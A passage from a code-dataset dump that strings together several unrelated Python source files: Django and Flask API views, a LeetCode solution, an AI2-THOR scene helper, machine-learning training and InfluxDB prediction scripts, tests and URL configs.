Cases**\n\n * Get a list of all users that are reports for the provided manager.\n\n * Add a user as a report under a manger.\n\n * Remove a user or all users under a manager.\n\n **GET Request**\n\n ::\n\n GET /api/user_manager/v1/managers/{user_id}/reports/\n\n **GET Parameters**\n\n * user_id: username or email address for user whose reports you want fetch\n\n **GET Response**\n\n GET /api/user_manager/v1/managers/{user_id}/reports/\n\n If the request for information about the managers is successful, an HTTP 200 \"OK\"\n response is returned with a collection of managers.\n\n The HTTP 200 response has the following values.\n\n * count: The number of managers in a course.\n\n * next: The URI to the next page of results.\n\n * previous: The URI to the previous page of results.\n\n * num_pages: The number of pages.\n\n * results: a list of users under a manager:\n\n * username: The username for a user.\n\n * email: Email address of user.\n\n **GET Response Example**\n\n ::\n\n GET /api/user_manager/v1/reports/edx@example.com/reports/\n\n {\n \"count\": 99,\n \"next\": \"https://courses.example.com/api/user_manager/v1/reports/edx@example.com/reports/?page=2\",\n \"previous\": null,\n \"results\": {\n {\n \"email\": \"staff@example.com\",\n \"username\": \"staff\"\n },\n { ... }\n }\n }\n\n\n **POST Request**\n\n ::\n\n POST /api/user_manager/v1/managers/{user_id}/reports/ {\n \"email\": \"{email}\"\n }\n\n **POST Parameters**\n\n * user_id: username or email address for user for whom you want to add a manger\n\n * email: Email address for a user\n\n **POST Response Example**\n\n ::\n\n POST /api/user_manager/v1/reports/edx@example.com/reports/ {\n \"email\": \"user@email.com\"\n }\n\n {\n \"email\": \"user@email.com\"\n \"username\": \"user\"\n }\n\n **Delete Requests**\n\n ::\n\n DELETE /api/user_manager/v1/managers/{user_id}/reports/\n\n DELETE /api/user_manager/v1/managers/{user_id}/reports/?user={user_id}\n\n **DELETE Parameters**\n\n * user_id: username or email address for user\n \"\"\"\n\n serializer_class = ManagerReportsSerializer\n\n def get_queryset(self):\n \"\"\"\n Return queryset with username filter.\n \"\"\"\n\n username = self.kwargs['username']\n return _filter_by_manager_id_or_email(UserManagerRole.objects, username)\n\n def perform_create(self, serializer):\n \"\"\"\n Use serializer to create ``UserManagerRole`` object using provided data.\n \"\"\"\n\n manager_id = self.kwargs['username']\n email = serializer.validated_data.get('user', {}).get('email')\n\n try:\n user = User.objects.get(email=email)\n except User.DoesNotExist:\n raise NotFound(detail='No user with that email')\n\n if '@' in manager_id:\n try:\n manager_user = User.objects.get(email=manager_id)\n except User.DoesNotExist:\n serializer.save(user=user, unregistered_manager_email=manager_id)\n return\n else:\n manager_user = User.objects.get(username=manager_id)\n\n serializer.save(manager_user=manager_user, user=user)\n\n def delete(self, request, *args, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Delete one or all reports for provided manager.\n \"\"\"\n\n user = request.query_params.get('user')\n queryset = _filter_by_user_id_or_email(self.get_queryset(), user)\n queryset.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserManagerListView(ManagerViewMixin, ListCreateAPIView):\n \"\"\"\n **Use Cases**\n\n * Get a list of the managers that a user directly reports to.\n\n * Add a manger for a user.\n\n * Remove all managers for a user, or remove a single manager for a user.\n\n **GET Request**\n\n ::\n\n GET /api/user_manager/v1/users/{user_id}/managers/\n\n **GET Parameters**\n\n * user_id: username or email address for user whose managers you want fetch\n\n **GET Response Values**\n\n If the request for information about the managers is successful, an HTTP 200 \"OK\"\n response is returned with a collection of managers.\n\n The HTTP 200 response has the following values.\n\n * count: The number of managers in a course.\n\n * next: The URI to the next page of results.\n\n * previous: The URI to the previous page of results.\n\n * num_pages: The number of pages.\n\n * results: a list of managers directly over a user:\n\n * username: The username for a manager (may be null if manager hasn't\n registered an account).\n\n * email: Email address of manager.\n\n **GET Response Example**\n\n ::\n\n GET /api/user_manager/v1/users/staff@example.com/managers/\n\n {\n \"count\": 99,\n \"next\": \"https://courses.example.com/api/user_manager/v1/users/staff@example.com/managers/?page=2\",\n \"previous\": null,\n \"results\": {\n {\n \"email\": \"edx@example.com\",\n \"username\": \"edx\"\n },\n { ... }\n }\n }\n\n **POST Request**\n\n ::\n\n POST /api/user_manager/v1/users/{user_id}/managers/ {\n \"email\": \"{email}\"\n }\n\n **POST Parameters**\n\n * user_id: username or email address for user for whom you want to add a manger\n\n * email: Email address for the manager\n\n **POST Response Example**\n\n ::\n\n POST /api/user_manager/v1/users/edx@example.com/managers/ {\n \"email\": \"user@email.com\"\n }\n\n {\n \"email\": \"user@email.com\"\n \"username\": \"user\"\n }\n\n **DELETE Requests**\n\n ::\n\n DELETE /api/user_manager/v1/users/{user_id}/managers/\n\n DELETE /api/user_manager/v1/users/{user_id}/managers/?user={user_id}\n\n\n **DELETE Parameters**\n\n * user_id: username or email address for manager\n \"\"\"\n\n serializer_class = UserManagerSerializer\n\n @staticmethod\n def _get_user_by_username_or_email(identifier):\n \"\"\"\n Get user by identifier, which could be an email or username.\n \"\"\"\n\n if '@' in identifier:\n return User.objects.get(email=identifier)\n else:\n return User.objects.get(username=identifier)\n\n def get_queryset(self):\n \"\"\"\n Get queryset filtered by username.\n \"\"\"\n\n username = self.kwargs['username']\n return _filter_by_user_id_or_email(UserManagerRole.objects, username)\n\n def perform_create(self, serializer):\n \"\"\"\n Use serializer to create ``UserManagerRole`` object using provided data.\n \"\"\"\n\n try:\n user = self._get_user_by_username_or_email(self.kwargs['username'])\n except User.DoesNotExist:\n raise NotFound(detail='No user with that email')\n\n manager_email = serializer.validated_data.get('manager_email')\n\n try:\n manager = User.objects.get(email=manager_email)\n serializer.save(manager_user=manager, user=user)\n except User.DoesNotExist:\n serializer.save(unregistered_manager_email=manager_email, user=user)\n\n def delete(self, request, *args, **kwargs): # pylint: disable=unused-argument\n \"\"\"\n Delete all manager for supplied user.\n \"\"\"\n\n manager = request.query_params.get('manager')\n queryset = _filter_by_manager_id_or_email(self.get_queryset(), manager)\n queryset.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"open-craft/openedx-user-manager-api","sub_path":"user_manager/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":12427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27782482682","text":"from typing import List\n\n\nclass Solution:\n def makesquare(self, ms: List[int]) -> bool:\n def solve(ms, square, pos, side):\n print(f\"solve({ms}, {square}, {pos}, {side})\")\n if pos >= len(ms):\n return all(ss == side for ss in square)\n \n for i in range(4):\n if ms[pos] + square[i] <= side:\n square[i] += ms[pos]\n if solve(ms, square, pos+1, side):\n return True\n else:\n square[i] -= ms[pos]\n\n return False\n\n perimeter = sum(ms)\n if perimeter % 4 != 0:\n return False\n side = perimeter // 4\n ms.sort(reverse=True)\n return solve(ms, [0]*4, 0, side)\n\n\nif __name__ == '__main__':\n import os\n import testcases.utils as utils\n testcases = utils.extract_testcases(__file__)\n utils.execute_tests(testcases, Solution, 'makesquare')\n","repo_name":"manimanis/Competitive_Programming","sub_path":"leetcode/d20210615/solution/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32694403887","text":"from ai2thor.controller import Controller\nimport copy\n\nvisibilityDistance = 1 #Visibility distance of agent (m)\n\nclass TypeNameHandler:\n def __init__(self) -> None:\n self.typingDict = dict()\n \n def generate_name(self, typeName: str) -> None:\n if typeName in self.typingDict.keys():\n self.typingDict[typeName][\"n\"] += 1\n else:\n self.typingDict[typeName] = {\"n\" : 1}\n\n return str(str.lower(typeName)+str(self.typingDict[typeName][\"n\"]))\n\nclass Object:\n\n typeNameHandler = TypeNameHandler()\n\n def __init__(self,fields: dict) -> None:\n if fields is not None:\n self.metadata = fields\n else:\n self.metadata = dict()\n\n def update(self, fields: dict):\n self.metadata.update(fields)\n \n def fromScene(self, objMetadata):\n if objMetadata is not None:\n \n #Take a copy of the original metadata\n metadata = copy.deepcopy(objMetadata)\n\n #Update some fields for compatability \n metadata.update({\n 'name': self.typeNameHandler.generate_name(objMetadata[\"objectType\"]),\n 'id': objMetadata[\"objectId\"],\n 'type': str.lower(objMetadata[\"objectType\"]),\n 'interactable': objMetadata[\"visible\"], #assumed to be interactable when seen\n 'position': (objMetadata[\"position\"][\"x\"], objMetadata[\"position\"][\"y\"], objMetadata[\"position\"][\"z\"]),\n 'temperature': Scene.temperatureNumericValue(objMetadata[\"temperature\"]),\n })\n\n #Clean some unwanted fields\n metadata.pop(\"objectType\", None)\n metadata.pop(\"objectTemperature\", None)\n metadata.pop(\"objectId\", None)\n else:\n metadata = dict()\n\n self.metadata = metadata\n \n\nclass Scene:\n '''Fetches important information about the scene in terms of pddl model'''\n\n def __init__(self, controller: Controller) -> None:\n '''Gets an event object of the current scene'''\n self.controller = controller\n self.objects, self.visibleObjects, self.holding = self.getObjectsState(self.controller)\n \n def getObjectsState(self, controller):\n '''Returns a dictionary of all objects in the scene, their types and other properties'''\n\n event = controller.step(action=\"Done\")\n\n listObj = []\n listVisible = []\n heldObject = None\n \n for obj in event.metadata[\"objects\"]:\n currObj = Object(fields=None)\n currObj.fromScene(obj)\n listObj.append(currObj)\n\n if currObj.metadata[\"isPickedUp\"]:\n heldObject = currObj.metadata[\"name\"]\n \n if currObj.metadata[\"visible\"]:\n listVisible.append(currObj.metadata[\"name\"])\n \n return listObj, listVisible, heldObject\n\n @staticmethod\n def temperatureNumericValue(tmp_str):\n if tmp_str == 'Cold':\n return 0\n if tmp_str == 'RoomTemp':\n return 1\n if tmp_str == 'Hot':\n return 2\n \n\n # def checkObjectReachability(self, obj):\n # corners = obj[\"objectOrientedBoundingBox\"]\n # return ((corners in self.reachablePositions) and obj[\"visible\"])\n\n \n\n\n\n \n\n \n\n","repo_name":"roymatza/Robochef","sub_path":"scene_info.py","file_name":"scene_info.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39321850999","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSupervised Machine Learning Exercise using Scikit Learn\r\n\r\n\"\"\"\r\nimport pandas as pd\r\nfrom matplotlib import pyplot as plt\r\n\r\nfrom copy import deepcopy\r\n\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.svm import SVR\r\nfrom sklearn.multioutput import MultiOutputRegressor\r\n\r\nimport pickle\r\n\r\n#Input variables\r\nn_params = 10\r\nn_objectives = 1\r\n\r\n#Set the file path\r\nfilePath = \"C:\\\\Users\\\\harri\\\\OneDrive\\\\Documents\\\\ITECH2020\\\\Academic Materials\\\\21_Som Sem\\\\3064044_Computing in Architecture\\\\2_Assignments\\\\_Final\\\\_Final Logs\\\\Supervised ML\\\\SOO\\\\\"\r\nfileName = \"dataset.csv\"\r\n\r\n#Read h=the file path\r\ndataset = pd.read_csv(filePath + fileName)\r\nprint(dataset.head)\r\n\r\n#Analyze the features using histogram\r\n#dataset.hist()\r\n#plt.show()\r\n\r\n#Create a separate dataset for parameters\r\nparameters_dataset = deepcopy(dataset)\r\nfor i in range(n_objectives):\r\n parameters_dataset.drop(parameters_dataset.columns[-1], axis=1, inplace=True)\r\n\r\nprint(parameters_dataset.head)\r\n\r\n#Create a separate dataset for objectives\r\nobjectives_dataset = deepcopy(dataset)\r\nfor i in range(n_params):\r\n objectives_dataset.drop(objectives_dataset.columns[0], axis=1, inplace=True)\r\n\r\nprint(objectives_dataset.head)\r\n\r\n# perform a robust scaler transform of the paramatersdataset\r\nsc = StandardScaler()\r\nstd_params_data = sc.fit_transform(parameters_dataset)\r\nstd_parameters_dataset = pd.DataFrame(std_params_data)\r\nstd_parameters_dataset.columns = parameters_dataset.columns\r\n\r\n#Save the standard scaler model\r\npickle.dump(sc, open(filePath + 'scaler_model.pkl','wb'))\r\n\r\n\r\n#std_parameters_dataset.hist()\r\n#plt.show()\r\n\r\nprint(std_parameters_dataset.head)\r\n\r\n# Split data for training and testing\r\nX_train, X_test, Y_train, Y_test = train_test_split(std_parameters_dataset, objectives_dataset, test_size=0.33, random_state=5)\r\n\r\n######### Polynomial Linear Regression #########\r\n#Transform the parameters by adding polynomial features\r\npoly = PolynomialFeatures(degree=2)\r\nX_poly = poly.fit_transform(X_train)\r\npoly.fit(X_poly, Y_train)\r\n\r\n#Do the regression\r\nreg_model = LinearRegression()\r\nreg_model.fit(X_poly, Y_train)\r\n\r\n#Evaluate the polynomial linear regression model with a cross validation\r\ncv_score_1 = cross_val_score(reg_model, X_poly, Y_train, cv=10).mean()\r\n\r\n#Test the model on the optimized model\r\nY_predict_poly = reg_model.predict(poly.fit_transform(X_test))\r\n\r\n\r\n######### Support Vector Regression #########\r\nsvr_model = SVR(kernel='poly', degree=2)\r\nmulti_svr_model = MultiOutputRegressor(svr_model)\r\nmulti_svr_model.fit(X_train, Y_train)\r\n\r\n#Evaluate the multi-output support vector regression model with a cross validation\r\ncv_score_2 = cross_val_score(multi_svr_model, X_train, Y_train, cv=10).mean()\r\n\r\n#Test the model on the optimized model\r\nY_predict_svr = multi_svr_model.predict(X_test)\r\n\r\n#Save the pretrained model with the best accuracy\r\nmodel_fileName = 'prediction_model.pkl'\r\npickle.dump(reg_model, open(filePath + model_fileName, 'wb'))","repo_name":"mengxihe/a_block_problem","sub_path":"Python Files/training_and_validation.py","file_name":"training_and_validation.py","file_ext":"py","file_size_in_byte":3214,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36397896358","text":"from functools import wraps\nimport logging\n\nfrom flask import abort\nfrom flask import Flask\nfrom flask import jsonify\nfrom flask import make_response\nfrom flask import request\nfrom flask import Response\nfrom flask import url_for\nfrom flask.views import MethodView\nfrom peewee import *\nfrom playhouse.flask_utils import get_object_or_404\nfrom playhouse.flask_utils import PaginatedQuery\nfrom werkzeug.exceptions import NotFound\n\nfrom scout.constants import PROTECTED_KEYS\nfrom scout.constants import RANKING_CHOICES\nfrom scout.constants import SEARCH_BM25\nfrom scout.exceptions import error\nfrom scout.models import database\nfrom scout.models import Attachment\nfrom scout.models import BlobData\nfrom scout.models import Document\nfrom scout.models import Index\nfrom scout.models import IndexDocument\nfrom scout.models import Metadata\nfrom scout.search import DocumentSearch\nfrom scout.serializers import AttachmentSerializer\nfrom scout.serializers import DocumentSerializer\nfrom scout.serializers import IndexSerializer\nfrom scout.validator import RequestValidator\n\n\nattachment_serializer = AttachmentSerializer()\ndocument_serializer = DocumentSerializer()\nindex_serializer = IndexSerializer()\n\nengine = DocumentSearch()\nvalidator = RequestValidator()\n\nlogger = logging.getLogger('scout')\n\n\ndef register_views(app):\n prefix = app.config.get('URL_PREFIX') or ''\n if prefix:\n prefix = '/%s' % prefix.strip('/')\n\n # Register views and request handlers.\n index_view = IndexView(app)\n index_view.register('index_view', '%s/' % prefix)\n\n document_view = DocumentView(app)\n document_view.register('document_view', '%s/documents/' % prefix)\n\n attachment_view = AttachmentView(app)\n attachment_view.register(\n 'attachment_view',\n '%s/documents//attachments/' % prefix,\n 'path')\n app.add_url_rule(\n '%s/documents//attachments//download/' % prefix,\n view_func=authentication(app)(attachment_download))\n\n\ndef authentication(app):\n def decorator(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n api_key = app.config.get('AUTHENTICATION')\n if not api_key:\n return fn(*args, **kwargs)\n\n # Check headers and request.args for `key=`.\n key = request.headers.get('key') or request.args.get('key')\n if key != api_key:\n logger.info('Authentication failure for key: %s', key)\n return 'Invalid API key', 401\n else:\n return fn(*args, **kwargs)\n return inner\n return decorator\n\n\nclass ScoutView(object):\n def __init__(self, app):\n self.app = app\n self.paginate_by = app.config.get('PAGINATE_BY') or 50\n\n def register(self, name, url, pk_type=None):\n auth = authentication(self.app)\n base_views = (\n (self.list_view, 'GET', name),\n (self.create, 'POST', name + '_create'))\n\n for view, method, view_name in base_views:\n self.app.add_url_rule(url, view_name, view_func=auth(view),\n methods=[method])\n\n if pk_type is None:\n detail_url = url + '/'\n else:\n detail_url = url + '<%s:pk>/' % pk_type\n name += '_detail'\n\n detail_views = (\n (self.detail, ['GET'], name),\n (self.update, ['POST', 'PUT'], name + '_update'),\n (self.delete, ['DELETE'], name + '_delete'))\n\n for view, methods, view_name in detail_views:\n self.app.add_url_rule(detail_url, view_name, view_func=auth(view),\n methods=methods)\n\n def paginated_query(self, query, paginate_by=None):\n return PaginatedQuery(\n query,\n paginate_by=paginate_by or self.paginate_by,\n check_bounds=False)\n\n def detail(self):\n raise NotImplementedError\n\n def list_view(self):\n raise NotImplementedError\n\n def create(self):\n raise NotImplementedError\n\n def update(self):\n raise NotImplementedError\n\n def delete(self):\n raise NotImplementedError\n\n def _search_response(self, index, allow_blank, document_count):\n ranking = request.args.get('ranking') or SEARCH_BM25\n if ranking not in RANKING_CHOICES:\n error('Unrecognized \"ranking\" value. Valid options are %s' %\n ', '.join(RANKING_CHOICES))\n\n ordering = request.args.getlist('ordering')\n filters = validator.extract_get_params()\n\n q = request.args.get('q', '').strip()\n if not q and not allow_blank:\n error('Search term is required.')\n\n query = engine.search(q or '*', index, ranking, ordering, **filters)\n pq = self.paginated_query(query)\n\n response = {\n 'document_count': document_count,\n 'documents': document_serializer.serialize_query(\n pq.get_object_list(),\n include_score=True if q else False),\n 'filtered_count': query.count(),\n 'filters': filters,\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count(),\n }\n if q:\n response.update(\n ranking=ranking,\n search_term=q)\n return response\n\n#\n# Views.\n#\n\nclass IndexView(ScoutView):\n def detail(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n document_count = index.documents.count()\n response = {'name': index.name, 'id': index.id}\n response.update(self._search_response(index, True, document_count))\n return jsonify(response)\n\n def list_view(self):\n query = (Index\n .select(\n Index,\n fn.COUNT(IndexDocument.id).alias('document_count'))\n .join(IndexDocument, JOIN.LEFT_OUTER)\n .group_by(Index))\n\n ordering = request.args.getlist('ordering')\n query = engine.apply_sorting(query, ordering, {\n 'name': Index.name,\n 'document_count': SQL('document_count'),\n 'id': Index.id}, 'name')\n\n pq = self.paginated_query(query)\n return jsonify({\n 'indexes': [index_serializer.serialize(index)\n for index in pq.get_object_list()],\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count()})\n\n def create(self):\n data = validator.parse_post(['name'])\n\n with database.atomic():\n try:\n index = Index.create(name=data['name'])\n except IntegrityError:\n error('\"%s\" already exists.' % data['name'])\n else:\n logger.info('Created new index \"%s\"' % index.name)\n\n return self.detail(index.name)\n\n def update(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n data = validator.parse_post(['name'])\n index.name = data['name']\n\n with database.atomic():\n try:\n index.save()\n except IntegrityError:\n error('\"%s\" is already in use.' % index.name)\n else:\n logger.info('Updated index \"%s\"' % index.name)\n\n return self.detail(index.name)\n\n def delete(self, pk):\n index = get_object_or_404(Index, Index.name == pk)\n\n with database.atomic():\n ndocs = (IndexDocument\n .delete()\n .where(IndexDocument.index == index)\n .execute())\n index.delete_instance()\n\n logger.info('Deleted index \"%s\" and unlinked %s associated documents.',\n index.name, ndocs)\n\n return jsonify({'success': True})\n\n\nclass _FileProcessingView(ScoutView):\n def _get_document(self, pk):\n if isinstance(pk, int) or (pk and pk.isdigit()):\n query = Document.all().where(Document._meta.primary_key == pk)\n try:\n return query.get()\n except Document.DoesNotExist:\n pass\n return get_object_or_404(Document.all(), Document.identifier == pk)\n\n def attach_files(self, document):\n attachments = []\n for identifier in request.files:\n file_obj = request.files[identifier]\n attachments.append(\n document.attach(file_obj.filename, file_obj.read()))\n logger.info('Attached %s to document id = %s',\n file_obj.filename, document.get_id())\n return attachments\n\n\nclass DocumentView(_FileProcessingView):\n def detail(self, pk):\n document = self._get_document(pk)\n return jsonify(document_serializer.serialize(document))\n\n def list_view(self):\n # Allow filtering by index.\n idx_list = request.args.getlist('index')\n if idx_list:\n indexes = Index.select(Index.id).where(Index.name << idx_list)\n else:\n indexes = None\n\n document_count = Document.select().count()\n return jsonify(self._search_response(indexes, True, document_count))\n\n def create(self):\n data = validator.parse_post(\n ['content'],\n ['identifier', 'index', 'indexes', 'metadata'])\n\n indexes = validator.validate_indexes(data)\n if indexes is None:\n error('You must specify either an \"index\" or \"indexes\".')\n\n if data.get('identifier'):\n try:\n document = self._get_document(data['identifier'])\n except NotFound:\n pass\n else:\n return self.update(data['identifier'])\n\n document = Document.create(\n content=data['content'],\n identifier=data.get('identifier'))\n\n if data.get('metadata'):\n document.metadata = data['metadata']\n\n logger.info('Created document with id=%s', document.get_id())\n\n for index in indexes:\n index.add_to_index(document)\n logger.info('Added document %s to index %s',\n document.get_id(), index.name)\n\n if len(request.files):\n self.attach_files(document)\n\n return self.detail(document.get_id())\n\n def update(self, pk):\n document = self._get_document(pk)\n data = validator.parse_post([], [\n 'content',\n 'identifier',\n 'index',\n 'indexes',\n 'metadata'])\n\n save_document = False\n if data.get('content'):\n document.content = data['content']\n save_document = True\n if data.get('identifier'):\n document.identifier = data['identifier']\n save_document = True\n\n if save_document:\n document.save()\n logger.info('Updated document with id = %s', document.get_id())\n\n if 'metadata' in data:\n del document.metadata\n if data['metadata']:\n document.metadata = data['metadata']\n\n if len(request.files):\n self.attach_files(document)\n\n indexes = validator.validate_indexes(data, required=False)\n if indexes is not None:\n with database.atomic():\n (IndexDocument\n .delete()\n .where(IndexDocument.document == document)\n .execute())\n\n if indexes:\n IndexDocument.insert_many([\n {'index': index, 'document': document}\n for index in indexes]).execute()\n\n return self.detail(document.get_id())\n\n def delete(self, pk):\n document = self._get_document(pk)\n\n with database.atomic():\n (IndexDocument\n .delete()\n .where(IndexDocument.document == document)\n .execute())\n (Attachment\n .delete()\n .where(Attachment.document == document)\n .execute())\n Metadata.delete().where(Metadata.document == document).execute()\n document.delete_instance()\n logger.info('Deleted document with id = %s', document.get_id())\n\n return jsonify({'success': True})\n\n\nclass AttachmentView(_FileProcessingView):\n def _get_attachment(self, document, pk):\n return get_object_or_404(\n document.attachments,\n Attachment.filename == pk)\n\n def detail(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n return jsonify(attachment_serializer.serialize(attachment))\n\n def list_view(self, document_id):\n document = self._get_document(document_id)\n query = (Attachment\n .select(Attachment, BlobData)\n .join(\n BlobData,\n on=(Attachment.hash == BlobData.hash).alias('_blob'))\n .where(Attachment.document == document))\n\n ordering = request.args.getlist('ordering')\n query = engine.apply_rank_and_sort(query, None, ordering, {\n 'document': Attachment.document,\n 'hash': Attachment.hash,\n 'filename': Attachment.filename,\n 'mimetype': Attachment.mimetype,\n 'timestamp': Attachment.timestamp,\n 'id': Attachment.id,\n }, 'filename')\n\n pq = self.paginated_query(query)\n return jsonify({\n 'attachments': [attachment_serializer.serialize(attachment)\n for attachment in pq.get_object_list()],\n 'ordering': ordering,\n 'page': pq.get_page(),\n 'pages': pq.get_page_count()})\n\n def create(self, document_id):\n document = self._get_document(document_id)\n validator.parse_post([], []) # Ensure POST data is clean.\n\n if len(request.files):\n attachments = self.attach_files(document)\n else:\n error('No file attachments found.')\n\n return jsonify({'attachments': [\n attachment_serializer.serialize(attachment)\n for attachment in attachments]})\n\n def update(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n validator.parse_post([], []) # Ensure POST data is clean.\n\n nfiles = len(request.files)\n if nfiles == 1:\n attachment.delete_instance()\n self.attach_files(document)\n elif nfiles > 1:\n error('Only one attachment permitted when performing update.')\n else:\n error('No file attachment found.')\n\n return self.detail(document.get_id(), attachment.filename)\n\n def delete(self, document_id, pk):\n document = self._get_document(document_id)\n attachment = self._get_attachment(document, pk)\n attachment.delete_instance()\n return jsonify({'success': True})\n\n\ndef attachment_download(document_id, pk):\n document = get_object_or_404(\n Document.all(),\n Document._meta.primary_key == document_id)\n attachment = get_object_or_404(\n document.attachments,\n Attachment.filename == pk)\n\n response = make_response(attachment.blob.data)\n response.headers['Content-Type'] = attachment.mimetype\n response.headers['Content-Length'] = attachment.length\n response.headers['Content-Disposition'] = 'inline; filename=%s' % (\n attachment.filename)\n\n return response\n","repo_name":"coleifer/scout","sub_path":"scout/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":15537,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"35911689682","text":"from django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout_then_login\n\nurlpatterns = [\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/login/$', login, name=\"login\"),\n url(r'^accounts/logout/$', logout_then_login, name=\"logout\"),\n url('', include('social_django.urls', namespace='social')),\n url(r'^lists/', include('lists.urls', namespace = 'lists')),\n url(r'^', include('lists.urls', namespace = 'lists')),\n]\n","repo_name":"MomomeYeah/FancyLists","sub_path":"urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20107850919","text":"import unittest\nfrom nikel_py import Buildings\n\nimport asyncio\n\ndef async_wrapper(f):\n def wrapper(*args, **kwargs):\n coro = asyncio.coroutine(f)\n future = coro(*args, **kwargs)\n loop = asyncio.get_event_loop()\n loop.run_until_complete(future)\n return wrapper\n\n'''\nData is subject to change. As such, Test Cases may or may not work in the future\n'''\n\n\nclass BuildingsTestCase(unittest.TestCase):\n\n def test_sync(self):\n\n #Gets name of Building where the Postal Code contains M5S\n\n x = Buildings.get({'address' : '~M5S'}, limit=1)[0]\n self.assertEqual(x.name, \"University College\")\n\n\n @async_wrapper\n async def test_async(self):\n\n #Gets Code of Building that has the name 'Hart House'\n\n x = await Buildings.async_get({'name' : 'Hart House'}, limit=1)\n x = x[0]\n self.assertEqual(x.code, \"HH\")\n\n\n\n\nif __name__ == '__main__':\n\n unittest.main()","repo_name":"Multivalence/nikel-py","sub_path":"tests/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22416484235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('desk', '0002_auto_20170311_2020'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='financialoperation',\n name='positionNumber',\n field=models.BigIntegerField(default=0),\n preserve_default=False,\n ),\n ]\n","repo_name":"icewind666/cashdesk-2","sub_path":"Cashdesk/desk/migrations/0003_financialoperation_positionnumber.py","file_name":"0003_financialoperation_positionnumber.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33799254138","text":"import pickle\nimport pandas as pd\nimport numpy as np\nfrom influxdb import InfluxDBClient\n\nclient = InfluxDBClient(host='influxus.itu.dk', port=8086, username='lsda', password='icanonlyread')\nclient.switch_database('orkney')\n\ndf = pd.DataFrame()\n\nresults = client.query('SELECT mean(Total) FROM \"Demand\" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw[\"series\"][0][\"values\"]\ndf = pd.concat([df, pd.DataFrame(values,columns=['time', 'demand'])], axis=1)\n\nresults = client.query('SELECT mean(\"M/S\") FROM \"Wind\" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw[\"series\"][0][\"values\"]\ndf = df.merge(pd.DataFrame(values, columns=['time', 'wind']), on='time')\n\nresults = client.query('SELECT mean(\"u\") FROM \"Wind\" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw[\"series\"][0][\"values\"]\ndf = df.merge(pd.DataFrame(values, columns=['time', 'u wind']), on='time')\n\nresults = client.query('SELECT mean(\"v\") FROM \"Wind\" WHERE time > now() - 1d GROUP BY time(1h)') # Query written in InfluxQL\nvalues = results.raw[\"series\"][0][\"values\"]\ndf = df.merge(pd.DataFrame(values, columns=['time', 'v wind']), on='time')\n\ndf = df.fillna(0)\narray = np.array(df)\n\nmeans = np.mean(array[:,1:].astype(float),axis=0)\n\nfor num in range(2,len(array[0])):\n for idx,i in enumerate(array):\n startidx = 0\n if i[num] == 0.0:\n for x in range(idx, len(array)):\n if array[x][num] != 0.0:\n mean = np.mean([array[startidx,num], array[x,num]])\n\n if mean == 0:\n mean = means[num]\n array[idx,num] = mean\n else:\n startidx = idx\n\nfor i in range(len(array)):\n for j in range(len(array[i])):\n if array[i,j]==0:\n array[i,j] = np.mean([array[i-1,j],array[i+1,j]])\n\nx = array[:,1:]\n\nsvc = pickle.load(open('trained_model.sav', 'rb'))\n\npred = pd.DataFrame(svc.predict(x))\npred.to_csv('predicted_curtailment.csv', index=False)\n","repo_name":"gergokoncz/itu","sub_path":"4th_semester/large_scale_data/assignment2/Assignment 2/predicting.py","file_name":"predicting.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33494401883","text":"from django.conf.urls import patterns, include, url\nfrom fitness import views\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'fitness.views.home', name='home'),\n # url(r'^fitness/', include('fitness.foo.urls')),\n\n # Uncomment the admin/doc line below to enable admin documentation:\n # url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n\n # Uncomment the next line to enable the admin:\n\turl(r'^workouts/', include('workouts.urls')),\n 